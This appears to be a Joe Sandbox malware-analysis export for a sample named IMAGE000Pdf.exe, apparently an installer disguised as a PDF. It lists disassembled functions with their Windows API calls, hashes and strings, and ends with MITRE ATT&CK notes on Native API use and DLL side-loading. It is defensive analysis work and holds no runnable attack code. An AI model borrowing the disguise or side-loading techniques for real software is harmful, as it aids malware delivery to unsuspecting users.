Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58

Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
MulDiv.KERNEL32(000DED8A,00000064,000DF8B0), ref: 00402F74
wsprintfW.USER32 ref: 00402F84
SetWindowTextW.USER32(?,?), ref: 00402F94
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6

Strings

verifying installer: %d%%, xrefs: 00402F7E

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
Instruction ID: 448c993359d53400b231c8c55bc41b2c2aaf26e1e6946bd82a433317a94b79bc
Opcode Fuzzy Hash: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
Instruction Fuzzy Hash: 1101FF70640209BBEF209F60DE4AFAA3B79EB04349F008039FA16A51D1DBB999559F58

Function 700225B5 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 7002121B: GlobalAlloc.KERNELBASE(00000040,?,7002123B,?,700212DF,00000019,700211BE,-000000A0), ref: 70021225

GlobalFree.KERNEL32(?), ref: 700226A3
GlobalFree.KERNEL32(00000000), ref: 700226D8

Memory Dump Source

Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 6c9c87b3c06f24079eba331cf0166deefa95cdb6a96fb0854ae30d6ae4b059f1
Instruction ID: 62d2ca7405cbe232492e33bc1598159ff0023cdb06abd0cbfffe8e7c2454bfb3
Opcode Fuzzy Hash: 6c9c87b3c06f24079eba331cf0166deefa95cdb6a96fb0854ae30d6ae4b059f1
Instruction Fuzzy Hash: 1131B033504101FFE7268FB5ECC8E2E77BAEB85B323304129F24187261C771A85A9B65

Function 700218D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 7002193A
GlobalFree.KERNEL32(?), ref: 70021ADA
GlobalFree.KERNEL32(?), ref: 70021ADF

Memory Dump Source

Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 8145d3760f45d5524db2a9fc99e78319169c33239c54096091ad550c152ac532
Instruction ID: 03e14d8aeb671c75ca4859a9c70f09ba03e99769548cc3f6e13e244184c28e9d
Opcode Fuzzy Hash: 8145d3760f45d5524db2a9fc99e78319169c33239c54096091ad550c152ac532
Instruction Fuzzy Hash: 2F51E732D05055AECB129FA4FD805EEB6FBEB74B37B114269E406A3344D770AF818792

Function 700223E0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 70022522

Part of subcall function 7002122C: lstrcpynW.KERNEL32(00000000,?,700212DF,00000019,700211BE,-000000A0), ref: 7002123C

GlobalAlloc.KERNEL32(00000040), ref: 700224A8
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 700224C3

Memory Dump Source

Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 3b7ddc189f5f0448ce2b89f1c33ddf52e57ee30c1b20a242d32d182ea441c848
Instruction ID: 3bf261c4995354775b73df8b9b072237dc25bade03bd30960d4f44fe96823947
Opcode Fuzzy Hash: 3b7ddc189f5f0448ce2b89f1c33ddf52e57ee30c1b20a242d32d182ea441c848
Instruction Fuzzy Hash: 5341CF71008305EFD325EFB0EC80A6E77F9FB58B32B20891DF94686292D770A545CB61

Function 7002161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,70022238,?,00000808), ref: 70021635
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,70022238,?,00000808), ref: 7002163C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,70022238,?,00000808), ref: 70021650
GetProcAddress.KERNEL32(70022238,00000000), ref: 70021657
GlobalFree.KERNEL32(00000000), ref: 70021660

Memory Dump Source

Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 3ef2a5638150cbd685245fbc0c647418c705a61f6b2fcb344889263d4c0d533b
Instruction ID: f486ee177f214617098f195c13f0f031be337e1f939b6ff5e02a3741c7159173
Opcode Fuzzy Hash: 3ef2a5638150cbd685245fbc0c647418c705a61f6b2fcb344889263d4c0d533b
Instruction Fuzzy Hash: A3F098732061387FA62116A78C8CE9BBE9CDF8B2F5B210215F728921A186A15D4297F5

Function 00405D6E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\,?,00405DE2,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F93420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
CharNextW.USER32(00000000), ref: 00405D81
CharNextW.USER32(00000000), ref: 00405D99

Strings

C:\, xrefs: 00405D6F

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA

Function 00405CC3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CC9
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CD3
lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405CE5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC3

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-297319885
Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD

Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
GetTickCount.KERNEL32 ref: 00402FE2
CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D

Function 00403A28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,76F93420,00000000,C:\Users\user\AppData\Local\Temp\,00403A00,00403816,00000007,?,00000007,00000009,0000000B), ref: 00403A42
GlobalFree.KERNEL32(009EDD88), ref: 00403A49

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403A28

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-297319885
Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
Instruction ID: 10b089f61d7fd26560bcfb3f790e8945b6a0be01d7b58778b04adbc7300f8739
Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
Instruction Fuzzy Hash: 64E0123360112057C6215F45FE0475ABB7D6F49B26F06803BE9C0BB26087785C838FD8

Function 00405D0F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMAGE000Pdf.exe,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D15
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMAGE000Pdf.exe,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D25

Strings

C:\Users\user\Desktop, xrefs: 00405D0F

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-2743851969
Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
Instruction ID: 3b4219a6871f3e4e2040e57eeeef2aaac809f1ec38f5d31038b50c09059f2d31
Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
Instruction Fuzzy Hash: 97D05EB34109209AE3127704DC0599F73E8EF5530074A8467E541A61A5D7785C818AAC

Function 700210E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 7002116A
GlobalFree.KERNEL32(00000000), ref: 700211C7
GlobalFree.KERNEL32(00000000), ref: 700211D9
GlobalFree.KERNEL32(?), ref: 70021203

Memory Dump Source

Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: c09cae25c0edd41a615556437777a6c82ad0572362777ce429dfb81fae7742ca
Instruction ID: 4e3ce9ba44b5cfd88457df2dfba3f2dea7e332300fe93da37f7799b4e129d79d
Opcode Fuzzy Hash: c09cae25c0edd41a615556437777a6c82ad0572362777ce429dfb81fae7742ca
Instruction Fuzzy Hash: B131A5B2500101DFE3008F65ED85AAE77FDEB64B33720011AFA41D7365E774E91287A5

Function 00405E49 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E59
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E82
lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E8B

Memory Dump Source

Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: a1795947179755a411c98c1569971d2b6f4e38ea7894d212e8297337e4f71977
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: E2F06231504514FFD7129BA5DD409AEBBA8EF06250B2540BAE884FB250D674DF029BE9

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

